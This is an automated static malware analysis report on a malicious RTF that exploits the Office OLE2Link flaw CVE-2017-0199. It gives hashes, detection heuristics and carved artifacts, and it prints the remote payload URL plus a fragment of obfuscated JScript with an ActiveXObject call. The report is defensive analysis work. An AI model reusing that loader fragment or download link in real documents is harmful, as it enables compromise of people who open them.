Malicious RTF — malware analysis report

Static analysis result for SHA-256 9b7b7b1a39f7811f…

MALICIOUS

RTF

1.87 MB Created: 2017-07-23 16:02:00 First seen: 2017-08-08
MD5: 79d7b486855736189ff78654af4e94b0 SHA-1: de08d27712c642563de20bd9952ba07b22f9b772 SHA-256: 9b7b7b1a39f7811f3eb4c0057d06a49a82227cb418b24d5ec543342632e0e233
342 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF file contains OLE objects and exhibits characteristics of CVE-2017-0199 exploitation. It attempts to download a payload from the URL http://192.168.0.199/dir1padpadpad/dir2padpadpad/dir3padpadpad/thisisthepayloadfile.doc, which is likely the next stage of the attack. The presence of large hex-encoded data within OLE objects further suggests the hiding of malicious content.

Heuristics 10

  • CVE-2017-0199 (OLE2Link / remote URL Moniker) critical CVE likely CVE_2017_0199
    RTF contains a URL Moniker OLE link whose decoded target is remote. Office can fetch and process the response through the CVE-2017-0199 OLE2Link attack path, but the server-side content type is not proven statically.
  • ClamAV: Rtf.Exploit.CVE_2017_0199-6335035-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2017_0199-6335035-0
  • Automatically linked OLE object high RTF_OBJAUTLINK
    RTF contains \objautlink — an automatically linked OLE object surface that can be updated or activated when Word opens the document.
  • Package object class high RTF_OBJCLASS_PACKAGE
    OLE Package object — can wrap arbitrary files
  • Large hex data blocks in OLE object high RTF_EXCESSIVE_HEX
    RTF contains ~1892KB of hex-encoded data inside \objdata sections — may hide a payload
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • OLE object data medium RTF_OBJDATA
    RTF contains 2 \objdata section(s) — embedded OLE objects
  • Embedded OLE object medium RTF_OBJEMB
    RTF contains \objemb — embedded OLE object
  • OlePres presentation stream in RTF OLE object medium RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://192.168.0.199/dir1padpadpad/dir2padpadpad/dir3padpadpad/thisisthepayloadfile.doc In RTF body
    • http://schemas.microsoft.com/office/word/2003/wordmlIn RTF body

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
objdata_00_off00003082.bin rtf-objdata-decoded RTF \objdata at offset 0x3082 13078 bytes
SHA-256: 27c9f7ae73e8a264a53de3fc8996c9c217df1f0f4e9e18a1869b2a5fb1684fcc
objdata_01_off001d1bc7.bin rtf-objdata-decoded RTF \objdata at offset 0x1D1BC7 4129 bytes
SHA-256: 2ca0c9e2e427ec790c95651ba0d173e37bdac36ee2138471aa45fe364e16ad58
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Quit()}}function vupuoGhPJITUcTaOb(){for(x=5592;4078>x;x++);for(x=6750;3466>x;x++);var r=new ActiveXObject(d([24,36,1,39,34,17,58,43,22,123,21,47,25,5,54,1,29] Carved artifact contains 2 shell/COM execution token(s).